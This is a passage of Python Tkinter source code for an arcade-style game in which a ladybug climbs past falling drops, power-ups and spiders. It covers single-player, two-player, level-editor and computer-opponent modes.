data.invincible.remove(powerUp)\r\n \r\nclass ScaryBug(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.speed = 25\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.spider)\r\n\r\n def onTimerFired(self, data):\r\n if data.mode ==\"2Player\" or data.mode == \"AI\":\r\n self.speed = 35\r\n self.y -= self.speed\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\" and\\\r\n data.time %8 ==0:\r\n #makes spider dynamically move\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if self.x -data.lane >=data.Player1Min:self.x-=data.lane\r\n else: self.x+=data.lane\r\n elif side == \"r\":\r\n if self.x+data.lane<= data.Player1Max:self.x +=data.lane\r\n else: self.x -=data.lane\r\n \r\n \r\n \r\ndef hitScaryBug(data):\r\n # checks for automatic death by spider\r\n for bug in data.scaryBug:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:\r\n if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:\r\n data.hit = True\r\n data.lives = 0\r\n data.levelEditorLives = 0\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:\r\n if bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:\r\n data.winner= \"player2\"\r\n if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:\r\n if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r:\r\n data.winner= \"player1\"\r\n\r\ndef drawPowerups(canvas, data):\r\n for bug in data.scaryBug:\r\n bug.draw(canvas, data)\r\n for powerUp in data.powerUps:\r\n powerUp.draw(canvas, data)\r\n for powerUp in data.invincible:\r\n powerUp.draw(canvas, data)\r\n\r\ndef drawHome(canvas, data):\r\n #home button in every screen\r\n canvas.create_image(data.homeX,data.homeY, image= data.home)\r\n\r\ndef checkHome(event, data):\r\n if data.homeY-data.r<= event.y <= data.homeY +data.r:\r\n if data.homeX-data.r<= event.x<=data.homeX+ data.r:\r\n init(data)\r\n \r\ndef coconutShot(data):\r\n if data.level >0 and data.pauseDrops == False:\r\n if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:\r\n #increases drops as level increases\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(data.Player1Max+data.buffer,\r\n data.width +data.buffer)\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n xPosition4 = random.randint(data.Player1Min-data.buffer,\r\n data.Player1Max+data.buffer)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n if data.time %5 ==0:\r\n xPosition3 = random.randint(0, data.Player1Min-data.buffer)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n if data.time % int(24/data.level) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(data.Player1Min,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(data.Player1Max,0))\r\n powerUpCoconutShot(data)\r\n \r\ndef powerUpCoconutShot(data):\r\n #adds powerUps\r\n #magic #s toallow for powerups to be added at different times\r\n if data.time % 60 == 0 and data.time%120 !=0:\r\n Position = random.choice(data.spotList)\r\n data.powerUps.append(PowerUps(Position,0))\r\n if data.time%50 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %100==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef playerKeyPressed(event,data):\r\n if data.level<data.levelMax and event.keysym == \"r\": init(data)\r\n if (event.keysym == \"Left\") and data.cx>=data.Player1Min+(data.lane/2):\r\n data.cx -=(data.lane)/2\r\n elif(event.keysym == \"Right\") and data.cx<=data.Player1Max:\r\n data.cx +=(data.lane)/2\r\n if data.level >= data.levelMax:\r\n #enter name for scoreboard\r\n if len(event.keysym) ==1:\r\n if len(data.name) <15:\r\n data.name += event.keysym\r\n if event.keysym==\"BackSpace\":\r\n data.name = data.name[0:-1]\r\n if event.keysym == \"Return\":\r\n data.scoreList += ((data.score, data.name))\r\n #saves file\r\n writeFile(\"score.txt\",\r\n data.savedScores+str(data.score)+\",\"+data.name+\"\\n\")\r\n data.mode =\"scoreboard\"\r\n \r\n\r\ndef playerMousePressed(event, data): checkHome(event, data)\r\n\r\ndef playerTimerFired(data):\r\n #actually pauses, and moves drops/player\r\n if data.hit== False and data.level<data.levelMax:\r\n data.cy-=data.speed\r\n if data.time%5 ==0: data.score +=data.level\r\n if data.cy < 15: #basically made it to the top\r\n data.level +=1\r\n data.cy = data.Player1Max + 10\r\n data.speed +=2\r\n if data.cy>40: #so drops you can't see don't hit you\r\n data.time +=1\r\n if data.pauseDrops !=True: coconutShot(data)\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n # only want drops to move if not paused\r\n if data.pauseDrops == False: coconut.onTimerFired(data)\r\n if data.beInvincible == False:hit(data)\r\n if data.start != None:\r\n if abs(data.start-data.cy) >= 120:\r\n #to limit time for powerups to be active\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\ndef playerRedrawAll(canvas, data):\r\n # magic #s mainly for screen placement\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,50, text =\"Level: %d\" %data.level,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/6,80, text =\"Score: %d\" %data.score,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(2*data.width/3,660,\r\n text =\"\"\"The greater the level, the more points get\r\n added to your score!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.hit== True:\r\n canvas.create_rectangle(0,0,data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,280, text =\"Score: %d\" %data.score,\r\n font = \"Arial 13 bold\", fill = \"yellow\")\r\n if data.level >= 8: madeIt(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef madeIt(canvas, data):# magic #s mainly for screen placement\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,70, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,100, text =\"Score: %d\" %data.score,\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,375, text =\"Congrats! Enter your Name!\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,\r\n fill = \"white\")\r\n canvas.create_text(data.width/2, 425, text = data.name)\r\n \r\n \r\n####################################\r\n# 2Player mode\r\n#################################### \r\ndef drop2Player(data):\r\n #adds drops when not paused\r\n #magic #s are position of where drops are starting\r\n if data.winner ==None and data.pauseDrops == False:\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:\r\n #so random drops don't interfere with the lane ones\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(xPosition1 +410,0))\r\n if data.time % 12 ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0))\r\n if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))\r\n powerupDrop2Player(data)\r\n\r\ndef powerupDrop2Player(data):\r\n #adds powerups on both screens (in the same position)\r\n if data.time % 45 == 0 and data.time%90 !=0:\r\n #randomize placement\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))\r\n if data.time%60 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))\r\n if data.time %90==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(540,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(755,750))\r\n \r\ndef twoPlayerKeyPressed(event,data):\r\n # controllers for both bugs\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"a\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player1X = 150\r\n if(event.keysym == \"d\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player1X = 330\r\n if (event.keysym == \"Left\") and data.onLeft2==False:\r\n data.onLeft2 = True\r\n data.player2X = 550\r\n if(event.keysym == \"Right\") and data.onLeft2 == True:\r\n data.onLeft2 = False\r\n data.player2X = 750\r\n\r\ndef twoPlayerMousePressed(event, data):\r\n checkHome(event, data)\r\n \r\ndef twoPlayerTimerFired(data):\r\n if data.winner == None:\r\n data.player1Y-=data.speed\r\n #<15 signifies that lady bug reached the top\r\n if data.player1Y < 15 and data.player2Y >15:\r\n data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n data.player2Y-=data.speed\r\n if data.player2Y < 15 and data.player1Y> 15:\r\n data.winner= \"player2\"\r\n if data.player2Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n if data.player1Y < 15 and data.player2Y <15:\r\n data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible:powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n powerupTimerFired(data)\r\n\r\ndef powerupTimerFired(data):\r\n for coconut in data.coconuts1:\r\n if data.pause1Drop == False:\r\n coconut.onTimerFired(data)\r\n hit2Player(data)\r\n for coconut in data.coconuts2:\r\n if data.pause2Drop == False:\r\n coconut.onTimerFired(data) \r\n if data.start1 != None:\r\n # to make powerups only active for set amount of time\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\ndef twoPlayerRedrawAll(canvas, data):\r\n #magic #s for placement on screen\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts1: coconut.draw(canvas)\r\n for coconut in data.coconuts2: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\r\n canvas.create_text(50,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 2\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n winner(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 1\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 2\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# editor mode\r\n####################################\r\n\r\ndef editorKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef editorMousePressed(event, data):\r\n #check for click on button for your speed\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.yourSpeed = \"slow\"\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.yourSpeed = \"medium\"\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.yourSpeed = \"fast\"\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n checkMiddle(event, data)\r\n checkLast(event, data)\r\n\r\ndef checkMiddle(event, data):\r\n #check for click on button for rain speed\r\n if data.medX-data.r<= event.y <= data.medX + data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.rainSpeed = \"drizzle\"\r\n data.drizzle = data.click\r\n data.rain, data.thunderstorm = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.rainSpeed = \"rain\"\r\n data.rain = data.click\r\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.rainSpeed = \"thunderstorm\"\r\n data.thunderstorm = data.click\r\n data.drizzle, data.rain = data.notClick, data.notClick\r\n\r\ndef checkLast(event, data):\r\n #check for click on button for powerups\r\n if data.last-data.r<=event.y<= data.last+data.r:\r\n if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r:\r\n data.powerUpsEditor = True\r\n data.yes, data.no = data.click, data.notClick\r\n if data.last-2*data.r<= event.x<=data.last+2*data.r:\r\n data.powerUpsEditor = False\r\n data.no, data.yes = data.click, data.notClick\r\n if data.enter == data.click:\r\n if data.enterX-data.r<=event.y<=data.enterX+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"levelCreated\"\r\n \r\n \r\n\r\ndef drawButtons(canvas, data):\r\n #makes each button\r\n data.font, data.fill = \"Helvetica 13 bold\", \"yellow\"\r\n canvas.create_text(data.medX,data.YST, text= \"Your Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyX,data.easyY, image = data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Slow\", font = data.font)\r\n canvas.create_image(data.medX,data.easyY, image = data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\", font = data.font)\r\n canvas.create_image(data.hardX,data.easyY, image = data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Fast\",font = data.font)\r\n canvas.create_image(data.easyX,data.medX, image = data.drizzle)\r\n canvas.create_text(data.medX,data.RST, text= \"Rain Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_text(data.easyX,data.medX, text=\"Drizzle\",font = data.font)\r\n canvas.create_image(data.medX,data.medX, image = data.rain)\r\n canvas.create_text(data.medX,data.medX, text=\"Rain\",font = data.font)\r\n canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)\r\n canvas.create_text(data.hardX,data.medX, text=\"Heavy\",font = data.font)\r\n canvas.create_text(data.medX,data.PUT, text= \"PowerUps?\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyY,data.last, image = data.yes)\r\n canvas.create_text(data.easyY,data.last, text=\"Yes\",font = data.font)\r\n canvas.create_image(data.last,data.last, image = data.no)\r\n canvas.create_text(data.last,data.last, text=\"No\",font = data.font)\r\n changeEnter(canvas, data)\r\n\r\ndef changeEnter(canvas, data):\r\n #makes it so the enter button respond to click\r\n if data.powerUpsEditor != None and data.yourSpeed != None and \\\r\n data.rainSpeed != None: data.enter = data.click\r\n canvas.create_image(data.medX,data.enterX, image = data.enter)\r\n canvas.create_text(data.medX,data.enterX, text=\"Enter\",font = data.font)\r\n\r\ndef editorTimerFired(data):\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n #background drops\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef editorRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.S_P -10, text = \"Edit Your Level!\",\r\n font=\"Arial 23 bold\", fill = \"yellow\")\r\n drawButtons(canvas, data)\r\n drawHome(canvas, data)\r\n####################################\r\n# levelCreated mode\r\n####################################\r\ndef setEverything(data):\r\n #customizing game\r\n if data.yourSpeed == \"slow\": data.speed = 6\r\n elif data.yourSpeed == \"medium\": data.speed = 10\r\n elif data.yourSpeed == \"fast\": data.speed = 14\r\n if data.rainSpeed == \"thunderstorm\": data.rSpeed = 7\r\n elif data.rainSpeed == \"rain\": data.rSpeed = 10\r\n elif data.rainSpeed == \"drizzle\": data.rSpeed = 13\r\n \r\n\r\ndef levelCoconutShot(data):\r\n #adding drops\r\n if data.levelEditorLives >0:\r\n if data.time%int(0.35*data.rSpeed) == 0:\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(770, 870)\r\n xPosition3 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n if data.time % int(0.55*data.rSpeed) ==0:\r\n xPosition3 = random.randint(0, 220)\r\n xPosition5 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition5,0))\r\n if data.time % int(data.rSpeed) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(3*data.width/8-20,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(7*data.width/8+40,0))\r\n xPosition4= random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n \r\n levelPowerUp(data)\r\n\r\ndef levelPowerUp(data):\r\n # adding power-ups only if clicked yes\r\n if data.powerUpsEditor == True:\r\n if data.time % 20 == 0 and data.time%40 !=0:\r\n Position = random.choice(data.spotList)\r\n data.powerUps.append(PowerUps(Position,0))\r\n if data.time%30 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %35==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef levelCreatedKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.levelEditorLives>0:\r\n if (event.keysym == \"Left\") and data.cx>=317:\r\n data.cx -=(data.lane/2)\r\n elif(event.keysym == \"Right\") and data.cx<=740:\r\n data.cx +=(data.lane/2)\r\n\r\ndef levelCreatedMousePressed(event, data):\r\n checkHome(event, data)\r\n\r\ndef levelCreatedTimerFired(data):\r\n setEverything(data)\r\n if data.levelEditorLives>0:\r\n data.cy-=data.speed\r\n if data.cy < 15:\r\n data.level +=1\r\n if data.cy>40:\r\n data.time +=1\r\n if data.pauseDrops !=True: levelCoconutShot(data)\r\n if data.powerUpsEditor == False:\r\n for coconut in data.coconuts: coconut.onTimerFired(data)\r\n hit(data)\r\n if data.powerUpsEditor == True:\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n if data.pauseDrops == False:coconut.onTimerFired(data)\r\n if data.beInvincible == False: hit(data)\r\n if data.start != None:\r\n #to make powerups only active for set amount of time\r\n if abs(data.start-data.cy) >= 120:\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\n\r\ndef levelCreatedRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n if data.powerUpsEditor == True: drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,100,\r\n text =\"Total Lives: %d\" %data.levelEditorLives,\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,660,\r\n text =\"\"\"You lose a life for hitting a drop\r\n & don't get eaten!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.levelEditorLives <=0:\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\") \r\n if data.level > 1: winEditor(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winEditor(canvas, data):\r\n #screen for when you win\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# AI Difficulty Mode\r\n####################################\r\ndef difficultyKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef drawDifficulties(canvas, data):\r\n canvas.create_text(data.medX,data.AITY, text= \"Computer Difficulty:\",\r\n font=\"Arial 23 bold\", fill = \"yellow\") \r\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Easy\")\r\n canvas.create_image(data.medX, data.easyY, image=data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\")\r\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Hard\")\r\n if data.difficulty !=None:\r\n data.enter = data.click\r\n canvas.create_image(data.medX, data.enterY, image=data.enter)\r\n canvas.create_text(data.medX,data.enterY, text=\"Enter\")\r\n\r\ndef difficultyMousePressed(event, data):\r\n #sets up buttons to customize\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.difficulty = data.difS\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.difficulty = data.difM\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.difficulty = data.difH\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n if data.enter == data.click:\r\n if data.enterY-data.r<=event.y<=data.enterY+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"AI\"\r\n\r\ndef difficultyTimerFired(data):\r\n # makes normal background rain\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef difficultyRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawDifficulties(canvas, data)\r\n drawHome(canvas, data)\r\n\r\n####################################\r\n# AI mode\r\n####################################\r\ndef hitAI1(data, distance):\r\n for coconut in data.coconutsAI1:\r\n # so AI switches by itself\r\n if (data.player1Y-data.r - coconut.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:\r\n testInt = random.randint(0,9)\r\n # to have different levels of difficulty\r\n if testInt<= data.difficulty:\r\n data.switchOnProgress= True\r\n if data.player1X == 150:\r\n data.player1X = 340\r\n else:\r\n data.player1X = 150\r\n data.switchOnProgress= False\r\n if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=50\r\n data.coconutsAI1.remove(coconut)\r\n\r\ndef AISwitchBug(data, distance):\r\n #AI to move for spider\r\n for scaryBug in data.scaryBug:\r\n if (data.player1Y-data.r - scaryBug.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if scaryBug.x>=data.player1X-data.r and \\\r\n scaryBug.x<=data.player1X+data.r:\r\n return True\r\n\r\ndef hitAI2(data, distance):\r\n # check if human controlled player hits drops\r\n for coconut in data.coconutsAI2:\r\n if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=50 \r\n data.coconutsAI2.remove(coconut)\r\n \r\ndef coconutShotAI(data):\r\n if data.winner ==None:\r\n # randomize position of drops off of tree\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition1 +410,0))\r\n if data.time%8 ==0:\r\n xPosition2 = random.randint(0,80)\r\n xPosition3 = random.randint(364, 385)\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition2,0))\r\n data.coconutsAI1.append(Coconuts(xPosition3,0)) \r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition2+410,0))\r\n data.coconutsAI2.append(Coconuts(xPosition3+410,0))\r\n addExtraCoconut(data)\r\n addPowerUpsAI(data)\r\n\r\ndef addExtraCoconut(data):\r\n #adds drops to edges of trees\r\n if data.time % (18) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(344,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(755,0))\r\n if data.time % 37 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(755,0))\r\n \r\ndef addPowerUpsAI(data):\r\n #randomly add powerups on tree\r\n if data.time%33 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(755,0))\r\n if data.time %66==0:\r\n side = random.choice(data.sides) \r\n if 